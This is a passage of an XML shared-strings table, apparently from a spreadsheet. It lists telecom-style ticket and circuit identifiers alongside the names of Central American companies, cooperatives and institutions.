    <t>F4555368</t>
  </si>
  <si>
    <t>F4555369</t>
  </si>
  <si>
    <t>F4555371</t>
  </si>
  <si>
    <t>F4555382</t>
  </si>
  <si>
    <t>F4555383</t>
  </si>
  <si>
    <t>F4555386</t>
  </si>
  <si>
    <t>F4555400</t>
  </si>
  <si>
    <t>F4555405</t>
  </si>
  <si>
    <t>F4555416</t>
  </si>
  <si>
    <t>F4593404</t>
  </si>
  <si>
    <t>F4593405</t>
  </si>
  <si>
    <t>17400442T</t>
  </si>
  <si>
    <t>1539618OH</t>
  </si>
  <si>
    <t>617800033T</t>
  </si>
  <si>
    <t>F4593428</t>
  </si>
  <si>
    <t>F4593431</t>
  </si>
  <si>
    <t>F4593433</t>
  </si>
  <si>
    <t>F4593439</t>
  </si>
  <si>
    <t>F4593449</t>
  </si>
  <si>
    <t>F4593450</t>
  </si>
  <si>
    <t>F4593459</t>
  </si>
  <si>
    <t>F4593479</t>
  </si>
  <si>
    <t>47503385T</t>
  </si>
  <si>
    <t>751200002T</t>
  </si>
  <si>
    <t>F4593502</t>
  </si>
  <si>
    <t>F4593506</t>
  </si>
  <si>
    <t>1732053OH</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4581</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1980</t>
  </si>
  <si>
    <t>F4593537</t>
  </si>
  <si>
    <t>4425060ON</t>
  </si>
  <si>
    <t>IP2399012SV</t>
  </si>
  <si>
    <t>F4593553</t>
  </si>
  <si>
    <t>F4614857</t>
  </si>
  <si>
    <t>CONTR0002328909OC</t>
  </si>
  <si>
    <t>F4614889</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4133</t>
  </si>
  <si>
    <t>F4614890</t>
  </si>
  <si>
    <t>F4614891</t>
  </si>
  <si>
    <t>4741557ON</t>
  </si>
  <si>
    <t>F4614892</t>
  </si>
  <si>
    <t>604400001T</t>
  </si>
  <si>
    <t>CLARO ENTERPRISE SOLUTIONS</t>
  </si>
  <si>
    <t>F4615008</t>
  </si>
  <si>
    <t>F4546295</t>
  </si>
  <si>
    <t>F4546355</t>
  </si>
  <si>
    <t>3717634ON</t>
  </si>
  <si>
    <t>F4580721</t>
  </si>
  <si>
    <t>90001910221T</t>
  </si>
  <si>
    <t>F4580730</t>
  </si>
  <si>
    <t>F4580731</t>
  </si>
  <si>
    <t>ID1038144SV</t>
  </si>
  <si>
    <t>EDITORIAL ALTAMIRANO MADRIZ S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4580741</t>
  </si>
  <si>
    <t>F4580750</t>
  </si>
  <si>
    <t>F4580763</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_028</t>
  </si>
  <si>
    <t>F4580772</t>
  </si>
  <si>
    <t>F4580774</t>
  </si>
  <si>
    <t>23130800SV</t>
  </si>
  <si>
    <t>ASOC.COOP.A.C.ALFONSO VERDUZCO</t>
  </si>
  <si>
    <t>F4580786</t>
  </si>
  <si>
    <t>F4580787</t>
  </si>
  <si>
    <t>F4580791</t>
  </si>
  <si>
    <t>292900045T</t>
  </si>
  <si>
    <t>F4580796</t>
  </si>
  <si>
    <t>4714555ON</t>
  </si>
  <si>
    <t>F4580805</t>
  </si>
  <si>
    <t>F4580806</t>
  </si>
  <si>
    <t>F4580807</t>
  </si>
  <si>
    <t>F4580810</t>
  </si>
  <si>
    <t>F4580813</t>
  </si>
  <si>
    <t>90001910493T</t>
  </si>
  <si>
    <t>F4580832</t>
  </si>
  <si>
    <t>973336OH</t>
  </si>
  <si>
    <t>OH1000783306/ORIFLAME DE HONDURAS S A  ORIFLAME DE HONDURAS S A</t>
  </si>
  <si>
    <t>459700002T</t>
  </si>
  <si>
    <t>F4580836</t>
  </si>
  <si>
    <t>F4580839</t>
  </si>
  <si>
    <t>625900062T</t>
  </si>
  <si>
    <t>625900241T</t>
  </si>
  <si>
    <t>625900105T</t>
  </si>
  <si>
    <t>F4580849</t>
  </si>
  <si>
    <t>F4580851</t>
  </si>
  <si>
    <t>F4580853</t>
  </si>
  <si>
    <t>F4580855</t>
  </si>
  <si>
    <t>F4580858</t>
  </si>
  <si>
    <t>F4580859</t>
  </si>
  <si>
    <t>8901785T</t>
  </si>
  <si>
    <t>F4580861</t>
  </si>
  <si>
    <t>F4580864</t>
  </si>
  <si>
    <t>F4580866</t>
  </si>
  <si>
    <t>F4580868</t>
  </si>
  <si>
    <t>291900010T</t>
  </si>
  <si>
    <t>ELEKTRA DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4540887</t>
  </si>
  <si>
    <t>F4574450</t>
  </si>
  <si>
    <t>F4574453</t>
  </si>
  <si>
    <t>F4574454</t>
  </si>
  <si>
    <t>F4574455</t>
  </si>
  <si>
    <t>F4574461</t>
  </si>
  <si>
    <t>IP2045201SV</t>
  </si>
  <si>
    <t>ALMACENES DE DESARROLLOS.A.</t>
  </si>
  <si>
    <t>F4574463</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_VICTORIA</t>
  </si>
  <si>
    <t>F4574466</t>
  </si>
  <si>
    <t>F4574470</t>
  </si>
  <si>
    <t>297400874T</t>
  </si>
  <si>
    <t>4887700ON</t>
  </si>
  <si>
    <t>ON0002700974/IAGUEI DIVISION VENTAS S.A-</t>
  </si>
  <si>
    <t>CONTR0002394098OC</t>
  </si>
  <si>
    <t>F4574496</t>
  </si>
  <si>
    <t>F4574507</t>
  </si>
  <si>
    <t>F4574508</t>
  </si>
  <si>
    <t>F4574517</t>
  </si>
  <si>
    <t>F4574519</t>
  </si>
  <si>
    <t>F4574522</t>
  </si>
  <si>
    <t>1682718OH</t>
  </si>
  <si>
    <t>F4574526</t>
  </si>
  <si>
    <t>22092110SV</t>
  </si>
  <si>
    <t>MAIKA,S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4574535</t>
  </si>
  <si>
    <t>F4574542</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_TIENDA_66</t>
  </si>
  <si>
    <t>F4574551</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3747</t>
  </si>
  <si>
    <t>F4574553</t>
  </si>
  <si>
    <t>867420OH</t>
  </si>
  <si>
    <t>ID1089002SV</t>
  </si>
  <si>
    <t>867300001T</t>
  </si>
  <si>
    <t>ASOCIACIÓN CIVIL LUMINARIAS DE GUATEMALA</t>
  </si>
  <si>
    <t>F4574565</t>
  </si>
  <si>
    <t>F4574567</t>
  </si>
  <si>
    <t>276800009T</t>
  </si>
  <si>
    <t>SECRETARIA DE BIENESTAR SOCIAL</t>
  </si>
  <si>
    <t>IP2328000SV</t>
  </si>
  <si>
    <t>ID1165106SV</t>
  </si>
  <si>
    <t>DISTRIBUIDORA DE LACTEOS Y ARTICULOS DE CONSUMO SA</t>
  </si>
  <si>
    <t>821200001T</t>
  </si>
  <si>
    <t>DECOACERO S.A.</t>
  </si>
  <si>
    <t>F4574578</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1498</t>
  </si>
  <si>
    <t>8600215T</t>
  </si>
  <si>
    <t>F4574589</t>
  </si>
  <si>
    <t>F4574594</t>
  </si>
  <si>
    <t>F4574595</t>
  </si>
  <si>
    <t>F4607470</t>
  </si>
  <si>
    <t>F4607499</t>
  </si>
  <si>
    <t>F4607500</t>
  </si>
  <si>
    <t>F4607501</t>
  </si>
  <si>
    <t>F4607507</t>
  </si>
  <si>
    <t>F4607509</t>
  </si>
  <si>
    <t>F4607512</t>
  </si>
  <si>
    <t>F4607523</t>
  </si>
  <si>
    <t>F4607534</t>
  </si>
  <si>
    <t>F4607538</t>
  </si>
  <si>
    <t>F4607547</t>
  </si>
  <si>
    <t>764400009T</t>
  </si>
  <si>
    <t>F4607566</t>
  </si>
  <si>
    <t>F4607569</t>
  </si>
  <si>
    <t>F4607576</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C683</t>
  </si>
  <si>
    <t>678000027T</t>
  </si>
  <si>
    <t>F4565656</t>
  </si>
  <si>
    <t>F4565666</t>
  </si>
  <si>
    <t>F4565685</t>
  </si>
  <si>
    <t>F4565705</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2441</t>
  </si>
  <si>
    <t>F4565726</t>
  </si>
  <si>
    <t>F4565769</t>
  </si>
  <si>
    <t>277200005T</t>
  </si>
  <si>
    <t>F4565821</t>
  </si>
  <si>
    <t>F4555463</t>
  </si>
  <si>
    <t>F4555474</t>
  </si>
  <si>
    <t>F4555476</t>
  </si>
  <si>
    <t>F4555505</t>
  </si>
  <si>
    <t>F4555595</t>
  </si>
  <si>
    <t>F4555598</t>
  </si>
  <si>
    <t>F4555599</t>
  </si>
  <si>
    <t>F4555604</t>
  </si>
  <si>
    <t>F4555618</t>
  </si>
  <si>
    <t>F4555631</t>
  </si>
  <si>
    <t>F4595163</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4082</t>
  </si>
  <si>
    <t>F4595165</t>
  </si>
  <si>
    <t>807900404T</t>
  </si>
  <si>
    <t>607700003T</t>
  </si>
  <si>
    <t>CELULOSAS Y COLORANTES DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>ID1025053SV</t>
  </si>
  <si>
    <t>KID'S WORLD SOCIEDAD ANONIMA DE CAPITAL VARIABLE</t>
  </si>
  <si>
    <t>F4595189</t>
  </si>
  <si>
    <t>573900004T</t>
  </si>
  <si>
    <t>1101531OH</t>
  </si>
  <si>
    <t>SUYAPA MAGDALENA DIAZ RODRIGUEZ</t>
  </si>
  <si>
    <t>F4595201</t>
  </si>
  <si>
    <t>42700495T</t>
  </si>
  <si>
    <t>F4595218</t>
  </si>
  <si>
    <t>578600001T</t>
  </si>
  <si>
    <t>GRUPO TLA GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4595220</t>
  </si>
  <si>
    <t>4079125ON</t>
  </si>
  <si>
    <t>F4595226</t>
  </si>
  <si>
    <t>1052190OH</t>
  </si>
  <si>
    <t>F4595234</t>
  </si>
  <si>
    <t>1601253OH</t>
  </si>
  <si>
    <t>607811ON</t>
  </si>
  <si>
    <t>IP2140010SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO DE NUEVA CONCEPCION S.C. DE R.L.</t>
  </si>
  <si>
    <t>616100001T</t>
  </si>
  <si>
    <t>TOTAL SERVICES S.A.</t>
  </si>
  <si>
    <t>F4595258</t>
  </si>
  <si>
    <t>ID1106050SV</t>
  </si>
  <si>
    <t>F4595276</t>
  </si>
  <si>
    <t>5385892ON</t>
  </si>
  <si>
    <t>F4595284</t>
  </si>
  <si>
    <t>F4595285</t>
  </si>
  <si>
    <t>F4595289</t>
  </si>
  <si>
    <t>38300587T</t>
  </si>
  <si>
    <t>ID1038217SV</t>
  </si>
  <si>
    <t>PERFUMERIA EL SALVADOR SA DE CV</t>
  </si>
  <si>
    <t>F4615675</t>
  </si>
  <si>
    <t>625900068T</t>
  </si>
  <si>
    <t>38300535T</t>
  </si>
  <si>
    <t>F4615681</t>
  </si>
  <si>
    <t>841700004T</t>
  </si>
  <si>
    <t>DISGUA DISTRIBUIDORA GUATEMALTECA, S.A.</t>
  </si>
  <si>
    <t>F4615707</t>
  </si>
  <si>
    <t>204500008T</t>
  </si>
  <si>
    <t>TELEFONOS DEL NORTE, S.A.</t>
  </si>
  <si>
    <t>671900172T</t>
  </si>
  <si>
    <t>F4615714</t>
  </si>
  <si>
    <t>IP2001138SV</t>
  </si>
  <si>
    <t>F4615729</t>
  </si>
  <si>
    <t>47503099T</t>
  </si>
  <si>
    <t>343800002T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C705</t>
  </si>
  <si>
    <t>1679829OH</t>
  </si>
  <si>
    <t>OH1001010053</t>
  </si>
  <si>
    <t>ID1036046SV</t>
  </si>
  <si>
    <t>COOPERATIVA COMPA¥ERO DIMAS RODRIGUEZ DE R.L</t>
  </si>
  <si>
    <t>F4615769</t>
  </si>
  <si>
    <t>F4615776</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_BOSQUES_DE_SAN_NICOLAS</t>
  </si>
  <si>
    <t>427100102T</t>
  </si>
  <si>
    <t>F4615802</t>
  </si>
  <si>
    <t>F4615811</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0263</t>
  </si>
  <si>
    <t>IDG000111SV</t>
  </si>
  <si>
    <t>F4615826</t>
  </si>
  <si>
    <t>833500002T</t>
  </si>
  <si>
    <t>CORPORACION AVANZA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>ID1064040SV</t>
  </si>
  <si>
    <t>FERRECONSTRUC SA DE CV</t>
  </si>
  <si>
    <t>F4615835</t>
  </si>
  <si>
    <t>F4548393</t>
  </si>
  <si>
    <t>F4548396</t>
  </si>
  <si>
    <t>F4548399</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_ANTIGUA_GUATEMALA</t>
  </si>
  <si>
    <t>F4548418</t>
  </si>
  <si>
    <t>F4548421</t>
  </si>
  <si>
    <t>F4548422</t>
  </si>
  <si>
    <t>F4548425</t>
  </si>
  <si>
    <t>F4548440</t>
  </si>
  <si>
    <t>CC_WALMART_GT_PALIN</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C700</t>
  </si>
  <si>
    <t>F4548487</t>
  </si>
  <si>
    <t>F4548491</t>
  </si>
  <si>
    <t>F4548509</t>
  </si>
  <si>
    <t>F4548515</t>
  </si>
  <si>
    <t>F4548517</t>
  </si>
  <si>
    <t>F4548523</t>
  </si>
  <si>
    <t>F4548532</t>
  </si>
  <si>
    <t>F4548533</t>
  </si>
  <si>
    <t>F4548544</t>
  </si>
  <si>
    <t>F4548546</t>
  </si>
  <si>
    <t>F4548554</t>
  </si>
  <si>
    <t>F4548555</t>
  </si>
  <si>
    <t>361700081T</t>
  </si>
  <si>
    <t>361700036T</t>
  </si>
  <si>
    <t>F4582688</t>
  </si>
  <si>
    <t>F4582689</t>
  </si>
  <si>
    <t>F4582695</t>
  </si>
  <si>
    <t>F4582696</t>
  </si>
  <si>
    <t>F4582697</t>
  </si>
  <si>
    <t>F4582700</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0492</t>
  </si>
  <si>
    <t>F4582704</t>
  </si>
  <si>
    <t>F4582710</t>
  </si>
  <si>
    <t>F4582712</t>
  </si>
  <si>
    <t>F4582713</t>
  </si>
  <si>
    <t>F4582714</t>
  </si>
  <si>
    <t>IP2407004SV</t>
  </si>
  <si>
    <t>F4582715</t>
  </si>
  <si>
    <t>8902260T</t>
  </si>
  <si>
    <t>F4582720</t>
  </si>
  <si>
    <t>F4582722</t>
  </si>
  <si>
    <t>F4582729</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0504</t>
  </si>
  <si>
    <t>F4582730</t>
  </si>
  <si>
    <t>F4582734</t>
  </si>
  <si>
    <t>F4582753</t>
  </si>
  <si>
    <t>F4582763</t>
  </si>
  <si>
    <t>393500007T</t>
  </si>
  <si>
    <t>F4582765</t>
  </si>
  <si>
    <t>F4582769</t>
  </si>
  <si>
    <t>F4582782</t>
  </si>
  <si>
    <t>F4582784</t>
  </si>
  <si>
    <t>F4582794</t>
  </si>
  <si>
    <t>F4582797</t>
  </si>
  <si>
    <t>F4542432</t>
  </si>
  <si>
    <t>F4542490</t>
  </si>
  <si>
    <t>F4574764</t>
  </si>
  <si>
    <t>F4574766</t>
  </si>
  <si>
    <t>ID1046019SV</t>
  </si>
  <si>
    <t>UNIVERSIDAD DON BOSCO</t>
  </si>
  <si>
    <t>344400722T</t>
  </si>
  <si>
    <t>IP2037287SV</t>
  </si>
  <si>
    <t>F4574779</t>
  </si>
  <si>
    <t>F4574780</t>
  </si>
  <si>
    <t>F4574781</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1253</t>
  </si>
  <si>
    <t>90001901286T</t>
  </si>
  <si>
    <t>F4574787</t>
  </si>
  <si>
    <t>F4574791</t>
  </si>
  <si>
    <t>F4574792</t>
  </si>
  <si>
    <t>F4574803</t>
  </si>
  <si>
    <t>F4574809</t>
  </si>
  <si>
    <t>F4574813</t>
  </si>
  <si>
    <t>F4574817</t>
  </si>
  <si>
    <t>F4574832</t>
  </si>
  <si>
    <t>929800001T</t>
  </si>
  <si>
    <t>SEMILLAS E INSUMOS AGROPECUARIOS, S.A.</t>
  </si>
  <si>
    <t>782047OH</t>
  </si>
  <si>
    <t>OH1000678131/CORPORACION CENTROAMERI DE SERVI DE NAVEGACION AER -</t>
  </si>
  <si>
    <t>F4574851</t>
  </si>
  <si>
    <t>337200003T</t>
  </si>
  <si>
    <t>CASBELSA</t>
  </si>
  <si>
    <t>F4574852</t>
  </si>
  <si>
    <t>F4574858</t>
  </si>
  <si>
    <t>F4574859</t>
  </si>
  <si>
    <t>1544159OH</t>
  </si>
  <si>
    <t>OPTICA POPULAR SA</t>
  </si>
  <si>
    <t>F4574871</t>
  </si>
  <si>
    <t>F4574875</t>
  </si>
  <si>
    <t>F4574887</t>
  </si>
  <si>
    <t>F4574888</t>
  </si>
  <si>
    <t>8902560T</t>
  </si>
  <si>
    <t>F4574891</t>
  </si>
  <si>
    <t>245700099T</t>
  </si>
  <si>
    <t>F4574896</t>
  </si>
  <si>
    <t>F4574897</t>
  </si>
  <si>
    <t>F4610542</t>
  </si>
  <si>
    <t>F4610543</t>
  </si>
  <si>
    <t>727100139T</t>
  </si>
  <si>
    <t>F4610546</t>
  </si>
  <si>
    <t>F4610548</t>
  </si>
  <si>
    <t>F4610549</t>
  </si>
  <si>
    <t>CC_PRONE_GT_CA_INTERAMERICANA_JUTIAPA</t>
  </si>
  <si>
    <t>751200005T</t>
  </si>
  <si>
    <t>F4610555</t>
  </si>
  <si>
    <t>458700001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA DE ALIMENTOS VESA, S.A.</t>
  </si>
  <si>
    <t>ID1383014SV</t>
  </si>
  <si>
    <t>ALISAL S.A. DE C.V..</t>
  </si>
  <si>
    <t>F4610576</t>
  </si>
  <si>
    <t>711900003T</t>
  </si>
  <si>
    <t>GCS GUATEMALA, S.A</t>
  </si>
  <si>
    <t>F4610582</t>
  </si>
  <si>
    <t>F4610587</t>
  </si>
  <si>
    <t>F4610590</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_301</t>
  </si>
  <si>
    <t>F4610591</t>
  </si>
  <si>
    <t>F4610596</t>
  </si>
  <si>
    <t>1701052OH</t>
  </si>
  <si>
    <t>F4610605</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_227</t>
  </si>
  <si>
    <t>F4610606</t>
  </si>
  <si>
    <t>820000018T</t>
  </si>
  <si>
    <t>MP232603023SSV</t>
  </si>
  <si>
    <t>F4610614</t>
  </si>
  <si>
    <t>625900069T</t>
  </si>
  <si>
    <t>38300596T</t>
  </si>
  <si>
    <t>38300544T</t>
  </si>
  <si>
    <t>5614381ON</t>
  </si>
  <si>
    <t>625900168T</t>
  </si>
  <si>
    <t>647400001T</t>
  </si>
  <si>
    <t>ASEGURADORA MUNDIAL, S.A.</t>
  </si>
  <si>
    <t>38300602T</t>
  </si>
  <si>
    <t>625900079T</t>
  </si>
  <si>
    <t>841200001T</t>
  </si>
  <si>
    <t>CORPORACION FE EN DIOS</t>
  </si>
  <si>
    <t>F4610657</t>
  </si>
  <si>
    <t>1147012OH</t>
  </si>
  <si>
    <t>21216400SV</t>
  </si>
  <si>
    <t>RYASA SA DE CV</t>
  </si>
  <si>
    <t>F4610666</t>
  </si>
  <si>
    <t>1017843OH</t>
  </si>
  <si>
    <t>F4610673</t>
  </si>
  <si>
    <t>F4610674</t>
  </si>
  <si>
    <t>F4610678</t>
  </si>
  <si>
    <t>F4574301</t>
  </si>
  <si>
    <t>673000034T</t>
  </si>
  <si>
    <t>297401320T</t>
  </si>
  <si>
    <t>90001911261T</t>
  </si>
  <si>
    <t>894500001T</t>
  </si>
  <si>
    <t>DOS PUNTOS CREA, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>940900001T</t>
  </si>
  <si>
    <t>SERVICRETO SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4574325</t>
  </si>
  <si>
    <t>610400002T</t>
  </si>
  <si>
    <t>COFIÑO STAHL Y CIA (CLARO XT MIGRACION)</t>
  </si>
  <si>
    <t>393500002T</t>
  </si>
  <si>
    <t>22487400SV</t>
  </si>
  <si>
    <t>VAPE S.A. DE C.V.</t>
  </si>
  <si>
    <t>451938ON</t>
  </si>
  <si>
    <t>F4574342</t>
  </si>
  <si>
    <t>237300018T</t>
  </si>
  <si>
    <t>F4574353</t>
  </si>
  <si>
    <t>5261691ON</t>
  </si>
  <si>
    <t>ASOCIACION CULTURAL Y SOCIO BENEFICA DE LOS HERMANOS MARISTAS DE GUATEMALA ..</t>
  </si>
  <si>
    <t>F4574373</t>
  </si>
  <si>
    <t>F4574374</t>
  </si>
  <si>
    <t>90001909745T</t>
  </si>
  <si>
    <t>F4574380</t>
  </si>
  <si>
    <t>22485444SV</t>
  </si>
  <si>
    <t>619516OH</t>
  </si>
  <si>
    <t>F4574390</t>
  </si>
  <si>
    <t>947100001T</t>
  </si>
  <si>
    <t>GRUPO INDUSTRIA MONTERREY,S.A.</t>
  </si>
  <si>
    <t>F4574393</t>
  </si>
  <si>
    <t>25240000SV</t>
  </si>
  <si>
    <t>ICON INTERNACIONAL S.A DE C.V</t>
  </si>
  <si>
    <t>F4574400</t>
  </si>
  <si>
    <t>F4574401</t>
  </si>
  <si>
    <t>F4574406</t>
  </si>
  <si>
    <t>397200011T</t>
  </si>
  <si>
    <t>F4574416</t>
  </si>
  <si>
    <t>F4574421</t>
  </si>
  <si>
    <t>CONTR0002456247OC</t>
  </si>
  <si>
    <t>F4555827</t>
  </si>
  <si>
    <t>F4555828</t>
  </si>
  <si>
    <t>F4555847</t>
  </si>
  <si>
    <t>F4555864</t>
  </si>
  <si>
    <t>F4555867</t>
  </si>
  <si>
    <t>F4555878</t>
  </si>
  <si>
    <t>F4555886</t>
  </si>
  <si>
    <t>F4555887</t>
  </si>
  <si>
    <t>F4555888</t>
  </si>
  <si>
    <t>F4555890</t>
  </si>
  <si>
    <t>F4555914</t>
  </si>
  <si>
    <t>F4555919</t>
  </si>
  <si>
    <t>1735847OH</t>
  </si>
  <si>
    <t>OH1001081339</t>
  </si>
  <si>
    <t>349900082T</t>
  </si>
  <si>
    <t>F4555932</t>
  </si>
  <si>
    <t>F4555935</t>
  </si>
  <si>
    <t>F4555936</t>
  </si>
  <si>
    <t>F4555941</t>
  </si>
  <si>
    <t>F4555964</t>
  </si>
  <si>
    <t>F4598735</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_INTERNET_ESCUINTLA</t>
  </si>
  <si>
    <t>F4598736</t>
  </si>
  <si>
    <t>F4598737</t>
  </si>
  <si>
    <t>F4598739</t>
  </si>
  <si>
    <t>F4598740</t>
  </si>
  <si>
    <t>F4598741</t>
  </si>
  <si>
    <t>F4598742</t>
  </si>
  <si>
    <t>F4598743</t>
  </si>
  <si>
    <t>F4598744</t>
  </si>
  <si>
    <t>F4598745</t>
  </si>
  <si>
    <t>F4598746</t>
  </si>
  <si>
    <t>F4598747</t>
  </si>
  <si>
    <t>F4598748</t>
  </si>
  <si>
    <t>F4598749</t>
  </si>
  <si>
    <t>F4598750</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0378</t>
  </si>
  <si>
    <t>F4598751</t>
  </si>
  <si>
    <t>F4598752</t>
  </si>
  <si>
    <t>F4598754</t>
  </si>
  <si>
    <t>F4598755</t>
  </si>
  <si>
    <t>F4598756</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C143</t>
  </si>
  <si>
    <t>F4598758</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C648</t>
  </si>
  <si>
    <t>F4598800</t>
  </si>
  <si>
    <t>F4598810</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_CC_PRADERA_ESCUINTLA_3G</t>
  </si>
  <si>
    <t>F4598832</t>
  </si>
  <si>
    <t>F4598851</t>
  </si>
  <si>
    <t>F4598855</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1984</t>
  </si>
  <si>
    <t>F4598860</t>
  </si>
  <si>
    <t>F4598861</t>
  </si>
  <si>
    <t>F4598870</t>
  </si>
  <si>
    <t>F4598873</t>
  </si>
  <si>
    <t>F4598874</t>
  </si>
  <si>
    <t>344400166T</t>
  </si>
  <si>
    <t>F4618156</t>
  </si>
  <si>
    <t>621100001T</t>
  </si>
  <si>
    <t>TELEFÓNICA INTERNATIONAL WHOLESALE_(XT)</t>
  </si>
  <si>
    <t>F4560217</t>
  </si>
  <si>
    <t>IP2025054SV</t>
  </si>
  <si>
    <t>863400123T</t>
  </si>
  <si>
    <t>F4560223</t>
  </si>
  <si>
    <t>1260471OH</t>
  </si>
  <si>
    <t>483200010T</t>
  </si>
  <si>
    <t>F4560238</t>
  </si>
  <si>
    <t>F4560241</t>
  </si>
  <si>
    <t>F4560244</t>
  </si>
  <si>
    <t>F4560253</t>
  </si>
  <si>
    <t>F4560255</t>
  </si>
  <si>
    <t>F4560258</t>
  </si>
  <si>
    <t>F4560262</t>
  </si>
  <si>
    <t>F4560285</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0019</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000422</t>
  </si>
  <si>
    <t>F4560288</t>
  </si>
  <si>
    <t>F4560289</t>
  </si>
  <si>
    <t>F4560290</t>
  </si>
  <si>
    <t>25239800SV</t>
  </si>
  <si>
    <t>FUNDACION PARA LA EDUCACION INTEGRAL SALVADOREÐA</t>
  </si>
  <si>
    <t>F4560293</t>
  </si>
  <si>
    <t>F4560295</t>
  </si>
  <si>
    <t>826900025T</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_DISTRITO_CUILAPA</t>
  </si>
  <si>
    <t>F4560326</t>
  </si>
  <si>
    <t>443900012T</t>
  </si>
  <si>
    <t>F4560330</t>
  </si>
  <si>
    <t>5296244ON</t>
  </si>
  <si>
    <t>F4560334</t>
  </si>
  <si>
    <t>899500001T</t>
  </si>
  <si>
    <t>442600006T</t>
  </si>
  <si>
    <t>SUPER FACIL S.A.</t>
  </si>
  <si>
    <t>452855ON</t>
  </si>
  <si>
    <t>F4583308</t>
  </si>
  <si>
    <t>938287OH</t>
  </si>
  <si>
    <t>F4583312</t>
  </si>
  <si>
    <t>F4583318</t>
  </si>
  <si>
    <t>1736662OH</t>
  </si>
  <si>
    <t>F4583319</t>
  </si>
  <si>
    <t>F4583322</t>
  </si>
  <si>
    <t>F4583326</t>
  </si>
  <si>
    <t>90001904996T</t>
  </si>
  <si>
    <t>745400001T</t>
  </si>
  <si>
    <t>LATINETWORK DICHTER &amp; NEIRA GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>52900045T</t>
  </si>
  <si>
    <t>F4583357</t>
  </si>
  <si>
    <t>F4583359</t>
  </si>
  <si>
    <t>IP2033098SV</t>
  </si>
  <si>
    <t>IP2106022SV</t>
  </si>
  <si>
    <t>8900902T</t>
  </si>
  <si>
    <t>938301OH</t>
  </si>
  <si>
    <t>5397824ON</t>
  </si>
  <si>
    <t>F4583371</t>
  </si>
  <si>
    <t>F4583374</t>
  </si>
  <si>
    <t>F4583375</t>
  </si>
  <si>
    <t>F4583385</t>
  </si>
  <si>
    <t>F4583394</t>
  </si>
  <si>
    <t>90001905489T</t>
  </si>
  <si>
    <t>F4583399</t>
  </si>
  <si>
    <t>F4583400</t>
  </si>
  <si>
    <t>F4583403</t>
  </si>
  <si>
    <t>F4583406</t>
  </si>
  <si>
    <t>F4583407</t>
  </si>
  <si>
    <t>F4583409</t>
  </si>
  <si>
    <t>ID2000001SV</t>
  </si>
  <si>
    <t>90001910189T</t>
  </si>
  <si>
    <t>IP2025145SV</t>
  </si>
  <si>
    <t>90001901232T</t>
  </si>
  <si>
    <t>F4583447</t>
  </si>
  <si>
    <t>F4544592</t>
  </si>
  <si>
    <t>340500074T</t>
  </si>
  <si>
    <t>340500077T</t>
  </si>
  <si>
    <t>F4575074</t>
  </si>
  <si>
    <t>F4575083</t>
  </si>
  <si>
    <t>F4575087</t>
  </si>
  <si>
    <t>F4575089</t>
  </si>
  <si>
    <t>F4575091</t>
  </si>
  <si>
    <t>490900009T</t>
  </si>
  <si>
    <t>F4575118</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0614</t>
  </si>
  <si>
    <t>F4575134</t>
  </si>
  <si>
    <t>F4575141</t>
  </si>
  <si>
    <t>F4575144</t>
  </si>
  <si>
    <t>F4575151</t>
  </si>
  <si>
    <t>47503100T</t>
  </si>
  <si>
    <t>F4575191</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4087</t>
  </si>
  <si>
    <t>F4611463</t>
  </si>
  <si>
    <t>302400001T</t>
  </si>
  <si>
    <t>MULTINACIONAL DE SERVICIOS CAMBIARIOS S.A.</t>
  </si>
  <si>
    <t>F4611506</t>
  </si>
  <si>
    <t>F4611545</t>
  </si>
  <si>
    <t>F4611575</t>
  </si>
  <si>
    <t>F4611607</t>
  </si>
  <si>
    <t>F4611617</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0853</t>
  </si>
  <si>
    <t>8900387T</t>
  </si>
  <si>
    <t>F4574900</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_CC_LA_TRINIDAD_COATEPEQUE</t>
  </si>
  <si>
    <t>F4574901</t>
  </si>
  <si>
    <t>F4574904</t>
  </si>
  <si>
    <t>F4574906</t>
  </si>
  <si>
    <t>F4574907</t>
  </si>
  <si>
